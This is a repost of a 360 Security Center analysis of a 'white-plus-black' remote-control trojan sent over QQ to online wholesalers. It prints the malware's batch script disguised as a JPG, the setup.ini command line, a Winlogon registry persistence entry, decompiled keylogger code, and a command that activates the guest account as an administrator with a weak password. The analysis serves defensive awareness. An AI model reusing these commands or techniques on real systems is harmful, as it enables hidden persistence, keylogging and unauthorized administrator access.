您的位置:首页>>电脑软件

远控木马巧设“白加黑”陷阱:瞄准网店批发商牟取钱财

发布时间:2018-02-01 18:52:17  来源:互联网   编辑:即时新闻  背景:

 前言

  近日,360安全中心监测到有不法分子通过添加QQ好友的形式,以沟通商品交易的名义发送名为“这几天团队的量”的文件,一旦接收并打开文件,电脑将被远程控制,不法分子可进一步盗取隐私及财物、甚至植入病毒实现敲诈勒索等操作。

  360安全中心对该样本进行分析发现,“这几天团队的量.rar”是一个将木马打包在其中的压缩包文件,投递目标主要是网络批发商。牧马人通过将木马伪装成数量详情图片文件,在与商家沟通的期间,发送木马文件给商家,引诱商家中招。

  当网店批发商在接受到文件后,解压出文件夹并点击了文件夹中的“宝贝批发数量.com”后,木马就会在后台偷偷跑起来。

  

 

  图0:解压后文件夹内容

  文件夹结构

  ┌─ 宝贝批发数量.com

  │

  ├─ setup.ini

  │

  └─ Data

  ├─ 2018.jpg

  │

  ├─ 360666

  │ ├─ 360666.PNG

  │ ├─ date

  │ ├─ QQAPP.exe

  │ ├─ Readme.txt

  │ ├─ TEMA

  │ ├─ WPS_office2016.lnk

  │ └─ WPS_office2017.lnk

  │

  └─ Order

  ├─ m.exe

  ├─ WoodTorch.exe

  └─ WPS.JPG

  分析

  宝贝批发数量.com

  该文件其实为白文件,它带有艾威梯科技(北京)有限公司数字签名。

  

 

  图1:白文件 签名信息

  程序在执行起来后会读取同目录下的setup.ini文件,根据配置文件中Install项里的CmdLine执行命令。而文件常规打开是一堆乱码,在十六进制试图下可以清楚看到Cmdline命令。

  

 

  图2:记事本浏览视图

  

 

  图3:十六进制浏览视图

  Cmdline命令如下:

  [Install]

  CmdLine=DataOrderWoodTorch.exe execmd DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG

  WoodTorch.exe

  被宝贝批发数量.com加载起来的WoodTorch.exe,实质上是命令行工具Nircmd。而上述的命令语句则是通过execmd这个执行命令指示符,在不显示任何信息至屏幕的情况下执行下面的语句:

  DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG

  m.exe

  系统的cmd程序,它的作用是用于加载WPS.JPG这个批处理文件。

  WPS.JPG

  从文件名上来看它是一个图片,但内容为批处理脚本。内容如下:

  

 

  图4:WPS.JPG

  @echo off

  cmd.exe /c start data2018.jpg

  md c:microsoft

  copy Data360666Readme.txt c:microsoftReadme.txt

  copy Data360666date c:microsoftdate

  copy Data360666360666.PNG c:microsoft360666.PNG

  copy Data360666QQAPP.exe c:microsoftQQAPP.exe

  copy /b Data360666TEMA+ Data360666WPS_office2016.lnk+Data360666WPS_office2017.lnk c:microsoftcommon.dll

  start C:MicrosoftQQApp.exe

  start c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall

  pause

  行为分析:

  1. 打开Data目录下的2018.jpg图片

  2. 创建目录 c:microsoft目录

  3. 拷贝Data360666目录下的Readme.txt、date、360666.PNG、QQAPP.exe到c:microsoft目录中

  4. 合并Data360666目录下的TEMA、WPS_office2016.lnk、WPS_office2017.lnk为c:microsoft目录下common.dll

  5. 执行C:MicrosoftQQApp.exe

  6. 执行c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall

  步骤1的目的是为了让批发商觉得自己真的是打开了一张图片

  

 

  图5:数量图

  步骤2-5为白加黑木马部分

  QQAPP.exe是带有腾讯签名的白文件,由于QQAPP.exe在调用Common.dll时,没有对Common.dll进行校验。牧马人通过将恶意文件拆分成TEMA、WPS_office2016.lnk、WPS_office2017.lnk三个文件,在程序执行过程中合并成common.dll。当QQAPP.exe执行的时候,恶意的common.dll就会被自动加载,从而执行恶意代码。

  l 步骤6的目的是通过360666.png中的配置信息让QQAPP.exe能够在重启后自启动,达到木马驻留受害者电脑的目的。

  [Version]

  Signature="$Windows NT$"

  [Defaultinstall]

  addREG=Gc

  [Gc]

  HKCU,"SoftwareMicrosoftWindows NTCurrentVersionWinlogon","shell","0x00000000","Explorer.exe,C:MicrosoftQQApp.exe"

  common.dll

  InitBugReport :

  a. 通过访问www[.]baidu[.]com测试网络连通性,如果访问失败则ExitProcess。

  

 

  图6:测试网络连通性

  b. 导出函数为空,伪造源文件导出函数SetBugReportUin、ValidateBugReport。

  void __cdecl TXBugReport::SetBugReportUin()

  {

  sub_10001F44();

  }

  void sub_10001F44()

  {

  ;

  }

  void __cdecl TXBugReport::ValidateBugReport()

  {

  sub_10001F4B();

  }

  void sub_10001F4B()

  {

  ;

  }

  c. 解密Readme.txt,解密后的Readme_dump文件为PeLoad。它负责读取解密同目录下的date文件,并创建新的线程执行解密后的date。

  

 

  图7:创建线程

  Readme_dump(解密后的Readme.txt)

  a. 干扰函数

  void Sleeps()

  {

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  Sleep(0);

  }

  b. 解密date文件。

  

 

  图8:解密算法

  c. 读取解密同目录下的date文件,并创建新的线程执行解密后的date。

  

  图9:加载木马

  木马主体(解密后的date)

  a. 判断C:ProgramDataMicrosoftWindowsStart MenuTorchwood.lnk文件是否存在,存在则删除文件。

  b. 通过加密字符串T1hEVVFMWFNEVhVfVlsr解密出CC。

  

 

  图10:解密CC地址

  c. 网络通讯

  

 

  图11:连接CC

  d. 键盘记录,通过异或0x62加密后保存到C:Windowssystem32ForShare.key。

  while ( 1 )

  {

  v2 = GetKeyState(16); // 获取shift键状态

  v3 = dword_BCEAF4[v8 / 4];

  if ( ((unsigned __int16)GetAsyncKeyState(dword_BCEAF4[v8 / 4]) >> 8) & 0x80 ) // 获取指定按键状态

  {

  if ( GetKeyState(20) && v2 > -1 && v3 > 64 && v3 < 93 )

  {

  *(&v5 + v3) = 1;

  }

  else

  {

  if ( !GetKeyState(20) )

  goto LABEL_38;

  if ( v2 >= 0 )

  goto LABEL_22;

  if ( v3 > 64 && v3 < 93 )

  {

  *(&v5 + v3) = 2;

  }

  else

  {

  LABEL_38:

  if ( v2 >= 0 )

  {

  LABEL_22:

  *(&v5 + v3) = 4;

  goto LABEL_34;

  }

  *(&v5 + v3) = 3;

  }

  

 

  图12:保存键盘记录

  e. 清除事件日志

  

 

  图13:清除事件日志

  f. 遍历进程,检测杀软

  

 

  图14:杀软字符串

  

 

  图15:遍历进程

  g.设置guest 密码,并添加到管理员组。

  net user guest /active:yes && net user guest 123456 && net localgroup administrators guest /add

  h. 其余功能主要还有文件管理、注册表管理、进程管理、shell操作、下载文件、更新客户端、卸载客户端等

  追溯

  根据CC地址duanjiuhao.top的域名信息获取到了域名持有者的姓名、邮箱、手机号。

  

 

  图16:whois信息

  最后

  年关将近,不法分子试图利用这些“白加黑”远控木马从中招用户那“谋财”。目前,360安全卫士已经对该类木马进行防御及查杀,在此也提醒网民,提防来历不明的文件、链接,同时开启安全软件,临近新年,为自己的隐私及财产安全加上一把锁。

  




关注ITBear科技资讯公众号(itbear365 ),每天推送你感兴趣的科技内容。

  声明:本文仅为传递更多网络信息,不代表ITBear观点和意见,仅供参考了解,更不能作为投资使用依据。


返回网站首页 本文来源:互联网

本文评论
苏湘两地百万网民沦为挖矿“苦力” 腾讯电脑管家全面拦截挖矿木马
数字货币高居不下的市场热度,正在引发越来越多的非法挖矿行为。近日,腾讯御见威胁情报中心通过腾...
日期:02-02
远控木马巧设“白加黑”陷阱:瞄准网店批发商牟取钱财
  近日,360安全中心监测到有不法分子通过添加QQ好友的形式,以沟通商品交易的名义发送名...
日期:02-01
360发布安卓系统报告:男性用户反成“安全菜鸟”
在大多数人印象中,男性用户大多为数码发烧友、IT达人,肯定比女生要更懂手机安全一些。但是,据近...
日期:01-31
“红月亮”于今晚降临,赏月需警惕木马病毒
万众瞩目,2018开年巨献——“夜空中的红宝石”将于今日晚19:48分左右在全国范...
日期:01-31
腾讯手机管家7.6版本上线,大王卡专区开启收费流量提醒
又到月末了,你的流量够用吗?谈到最实惠的流量套餐,莫过于拥有超低资费和免流服务的定向免流手机卡...
日期:01-30
关注留守儿童假期安全,360手机卫士联合公益组织发起倡
随着春节的临近,又到了外出务工人员陆续返乡的时候。不过,最近全国普降大雪,延误了回乡的车次,...
日期:01-30
360发布2017年度安卓系统研究报告 安全系数同比上升
近年来,随着华为、小米、OPPO等安卓系手机厂商发力,安卓机的外观设计、系统性能、配置水平均获得...
日期:01-26
腾讯手机管家安卓7.6版本上线,亲情守护家人安全
过年回家送父母什么礼物呢?是温暖的羽绒服,还是养生的红枣枸杞呢?相信不管子女送什么,父母都会十...
日期:01-26
Intel:今年末将发布完全不受漏洞门影响的CPU新品
1月26日,Intel发布了2017年Q4(截止到12月30日)及全年财报,虽然由于美国税改导致同比转亏,但其他...
日期:01-26
数据中心联盟推出“可信应用分发模块评估” 360手机卫士入选
1月19日,由工信部指导成立的数据中心联盟发布“可信应用分发模块——用户数据和权...
日期:01-24
腾讯御见威胁情报中心:伊朗APT组织“人面马”再度活跃
近日,据腾讯御见威胁情报中心监测发现,伊朗的APT组织——“人面马”(T-APT-0...
日期:01-24
《报告》:腾讯手机管家查杀病毒12.42亿次,助力全民反诈骗
收到诈骗短信怎么办?是赶快删掉“看不见就不会被骗”还是压根就没意识到这是诈骗?近日,...
日期:01-23
腾讯电脑管家魔镜壁纸焕新登场 打造你的个性化桌面
在繁忙的工作生活中,也存在一些小细节可以缓解高强度的工作压力,转换紧张的情绪。近日,腾讯电脑...
日期:01-22
小心被监控!360手机卫士揭秘超强安卓恶意软件
“非官方渠道的App不安全”已成为如今智能手机用户的常识,对于陌生的App大多数用户也保...
日期:01-22
春运进入返程抢票高峰期 搜狗浏览器教你如何快速抢票
历尽千辛万苦,好不容易抢到回家过年车票的你是不是又开始担心无法按时返程?
日期:01-22
WiseCRM365进入4.0时代,更贴近用户体验
新年新气象,WiseCRM365在2018年的第一天发布全新4.0版本,不管是风格还是业务流程管理都顺应现代企...
日期:01-18
安全防火墙全面升级 360主防6.0震撼上线
2017年,黑客武器库泄露、勒索病毒攻击、高危漏洞频发,给全球互联网用户带来了许多惊心动魄的瞬间...
日期:01-15
服务平台时代,办公软件如何搞定新一代用户?
1月6日,第五届中国互联网运营大会(IOCON 2018)在上海举行,金山办公首次对外曝光了下一代的WPS Off...
日期:01-12
频繁弹窗怎么破?360清理大师助你答题免打扰
最近,《百万赢家》、《冲顶大会》、《百万英雄》等直播有奖答题火爆了各大社交平台,今天晚上九点...
日期:01-10
360网络安全响应中心发布CPU漏洞修复指南
0x00 概述
  2018年1月4日,Jann Horn等安全研究者披露了"Meltdown"(CVE-2017-5754)和"Spe...
日期:01-09